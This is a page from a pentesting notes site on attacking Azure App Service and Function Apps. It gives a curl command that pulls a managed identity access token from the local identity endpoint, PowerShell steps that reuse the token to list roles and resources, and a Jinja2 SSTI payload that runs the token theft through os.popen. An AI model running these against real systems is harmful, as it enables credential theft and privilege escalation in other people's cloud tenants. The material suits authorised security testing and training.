Pentesting Notes
  • Home
  • 🌐Web pentesting
    • Content Discovery
    • Subdomain Enumeration
    • Authentication bypass
    • IDOR (Insecure Direct Object Reference)
    • Git repository
    • XSS
    • SSRF
    • CSRF
    • Injection
      • SQL Injection
      • Cypher injection
      • Command injection
      • Server Side Template Injection
      • NoSQL injection
      • XXE
    • FI (File Inclusion)
    • File upload
    • OAuth
    • JWT
    • CORS
    • Prototype pollution
    • Request Smuggling
  • Windows Pentesting
    • Enumerating users (No credentials)
    • Privilege Escalation
    • Post-Exploitation
    • Cross-domain enumeration
    • LDAP port (389, 636, 3268, 3269)
    • SMB port (139,445)
    • MSSQL port (1433)
    • Certificate Authority (CA)
    • Delegation attacks
    • Attacking Kerberos
    • Relay attacks
    • Bypassing Security
    • File Transfer
    • GPO (Group Policy Object)
    • Tools
      • Mimikatz
      • NetExec
      • Crackmapexec (CME)
      • Powerview
      • Bloodhound
      • Impacket
      • BloodyAD
      • Sliver C2
  • 🐧Linux Pentesting
    • Linux Privilege Esclation
    • Escape docker
    • Ansible
  • 🕊️Cross platform pivoting
    • Pivoting
  • ☁️Cloud
    • Kubernetes
    • Azure
      • Architecture
        • RBAC & ABAC roles
        • Entra ID roles
        • Entra ID - Authentication with OAuth and API's
        • Consent and Permissions
      • Service Discovery, Recon, Enumeration and Initial Access Attacks
        • Unauthenticated Recon
        • Password Spraying
        • Azure App Service
        • Azure Blob Storage
        • Phishing with Evilginx
        • Conditional Access
      • Authenticated Enumeration
        • ROADTools
        • BloodHound & AzureHound
        • Storage Accounts (database)
      • Privilege Escalation
        • Illicit Consent Grant
        • Macro enabled Word-files (Revshell)
        • Add secrets to app
        • Automation Accounts & Function Apps
        • Virtual Machines
        • Key Vault
        • ARM Deployment History
        • Enterprise Application / Service Principal
      • Lateral Movement
        • Entra ID Devices & Primary Refresh Tokens
        • Dynamic Groups
        • Application Proxy
        • Hybrid Identity
  • 🔁Reversing
    • Windows executables and DLL's
    • Linux binaries
    • Java applications
    • Android APK
  • 🛜Wireless networks
    • WPA/WPA2
    • WPS
    • WEP
    • Capative portal bypass
    • Setting up a Rogue Access Point
    • WPA Enterpise (WPA-MGT)
  • ⭐Tips and tricks
    • Tips and tricks
Powered by GitBook
On this page
  • Isolation
  • App Service Abuse
  • Managed Identity
  • Check App Privileges
  • SSTI payload
  • Function App
  1. Cloud
  2. Azure
  3. Service Discovery, Recon, Enumeration and Initial Access Attacks

Azure App Service

PreviousPassword SprayingNextAzure Blob Storage

Last updated 3 months ago

Azure App Service is an HTTP-based service for hosting web applications, REST APIs, and mobile back ends. It supports both Windows and Linux environments.

Isolation

Each app runs inside a sandbox but isolation depends upon App Service plans

  • Apps in Free and Shares tiers run on shared VMs

  • Apps in standard and premium tiers run on dedicated VMs

App Service Abuse

While there are default security features available with App Service (sandboxing/isolation), vulnerabilities in the code deployed are abusable. The classic web app vulns like SQL injection, OS command injection, etc do not disappear.

Managed Identity

By abusing and vulnerability in an app service and it is possible to get command execution, the privileges will be of the low-privilege worker process. But if the app service uses a Managed Identity, we may have the ability to have interesting permissions on other Azure resources.

Once you have command execution, run envto check if the identity_headervariable and identity_endpointare set. If they are, the app has a managed identity

Now, to get a access_token for the app service, we can use the following command:

curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER

Check App Privileges

Once you have a access_token for the app service, use that to connect to Az Cli:

Connect-AzAccount -AccessToken $token -AccountID 064aaf57-30af-41f0-840a-xxxxx

Now to check which Role Assignments our token has run:

Get-AzRoleAssignment

To get the available resources run:

Get-AzResource

SSTI payload

Found a app vulnerable to SSTI (Jinja2), use this payload to get the app's access_token:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read() }}

Function App

A function app (also called Azure Functions), is Azure's 'serverless' solution to run code. A function app is supposed to be used to react to an event like:

  • HTTP Trigger

  • Processing a File upload

  • Run code on a scheduled time and more

Function apps also support managed identities!

It looks a lot like AWS Lambda

When you get the following error , it means the access_token has to access to any resources:

By default, managed identities (service principals), have no read access at all!

In this case, something like AzureHound comes in handy

☁️